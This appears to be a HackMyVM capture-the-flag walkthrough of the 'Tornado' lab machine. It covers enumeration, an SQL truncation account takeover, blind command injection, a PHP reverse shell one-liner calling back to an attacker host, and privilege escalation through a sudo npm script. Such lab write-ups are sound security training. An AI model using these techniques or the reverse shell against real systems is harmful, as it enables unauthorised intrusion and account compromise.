Try   HackMD

HackMyVM - Tornado

Credit to the creator of the VM @catch_me75

Now as always let’s start with a nmap scan.

Enumeration

# Nmap 7.91 scan initiated Wed Dec 30 10:01:46 2020 as: nmap -sC -sV -p22,80 -oN nmap IP
Nmap scan report for tornado (IP)
Host is up (0.00064s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 0f:57:0d:60:31:4a:fd:2b:db:3e:9e:2f:63:2e:35:df (RSA)
|   256 00:9a:c8:d3:ba:1b:47:b2:48:a8:88:24:9f:fe:33:cc (ECDSA)
|_  256 6d:af:db:21:25:ee:b0:a6:7d:05:f3:06:f0:65:ff:dc (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:45:15:72 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 30 10:01:53 2020 -- 1 IP address (1 host up) scanned in 7.62 seconds

Once we visit the website we see the apache2 default page so let’s fire up gobuster and enumerating the port 80.

gobuster dir -q -u http://$ip/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak -o gobuster.txt

/index.html (Status: 200)
/manual (Status: 301)
/javascript (Status: 301)
/bluesky (Status: 301)
/server-status (Status: 403)

We have a /bluesky directory and nothing special there.. uuhm. Let's enumerate this one.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

gobuster dir -q -u http://$ip/bluesky -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak -o gobuster.txt

/index.html (Status: 200)
/contact.php (Status: 302)
/about.php (Status: 302)
/login.php (Status: 200)
/signup.php (Status: 200)
/css (Status: 301)
/imgs (Status: 301)
/js (Status: 301)
/logout.php (Status: 302)
/dashboard.php (Status: 302)
/port.php (Status: 302)

We can see a login page.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Let's have a look at the source code

<input type="text" name="uname" placeholder="email" maxlength="13"><br><br> <input type="password" name="upass" placeholder="password"><br><br> <input type="submit" value="Login" name="btn" class="button"><br>

We can see that the maximum character length is 13.
There was another signup.php page. Have a look at it and sign up.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

In the dashboard we can navigate between home, about and portfolio. Only the contact page cannot be viewed - the comment feature has been turned off because of security purpose. In the source code of "Portfolio", we find a hint.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

mmh interesting! Let's check it out

Tried LFI vulnerability to access the imp.txt file but got nothing, then I remembered there is a way we can create alias in apache config file and also in linux cd ~user means home directory of user, so I though to give a try for ~tornado and then I found the imp.txt

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

imp.txt

ceo@tornado
cto@tornado
manager@tornado
hr@tornado
lfi@tornado
admin@tornado
jacob@tornado
it@tornado
sales@tornado

We find several emails and I enumerate them all with rockyou dict.
The only password I found was admin@tornado:hello
But that turned out to be a rabbit hole we do not find anything new after we are logged in.


Do you remember the maximum character length of 13?
This brings me to the SQL Truncation Attack

The SQL Truncation vulnerability is a very interesting flaw in the database. The successful exploitation of this issue leads to user account compromise, as it means an attacker can access any users account with his own password. Sounds interesting!

<input type="text" name="uname" placeholder="email" maxlength="13">

Change the maxlength 13 to 15

<input type="text" name="uname" placeholder="email" maxlength="15">

Let's not waste time and register with jacob@tornado email but with one space and one character.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

So we registered jacob from this form and then logged in into the application. "Welcome User jacob@tornado" successfully logged in.

We find a comment field on the contact page that was not available before.

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Here's the tricky part, because if you run id command in contact page, it will not show you any output. Using sleep 30 command it was confirmed that this is RCE vulnerability.

Shell as www-data

use php reverse shell and start a Netcat listener.

php -r '$sock=fsockopen("Ip",Port);exec("/bin/sh -i <&3 >&3 2>&3");'

www-data@tornado:/var/www/html/bluesky$ whoami && id
whoami && id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@tornado:/var/www/html/bluesky$

sudo -l
(catchme) NOPASSWD: /usr/bin/npm

npm is a package manager for the JavaScript programming language.

Road to User

First i created an index.js file
cd /tmp
mkdir shell
echo 'module.exports = install could be dangerous' > index.js
cp index.js shell

Now we need a package.json file and chmod to make it executable.

{ "name": "shell", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "shell": "/bin/bash" }, "author": "", "license": "ISC" }

Finally, execute the script - command:

sudo -u catchme npm run-script shell

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Image Not Showing Possible Reasons
  • The image file may be corrupted
  • The server hosting the image is unavailable
  • The image path is incorrect
  • The image format is not supported
Learn More →

Shell as root

I enumerated a lot but i really didn’t find something exploitable.
In the home directory of catchme, you will find a python script called enc.py

It's Caesar keyed and similar to rot13.

Find the encrypted string inside and either rewrite the code, or go to this website (http://rumkin.com/tools/cipher/caesar-keyed.php) and enter each letter individually.
Example: a, b, c, d, e

Once you have done it correctly, you will find the root password :)


Tornado created by catch_me75 (thank you)
This machine can be found at HackMyVM
> Check it out!

https://hackmyvm.eu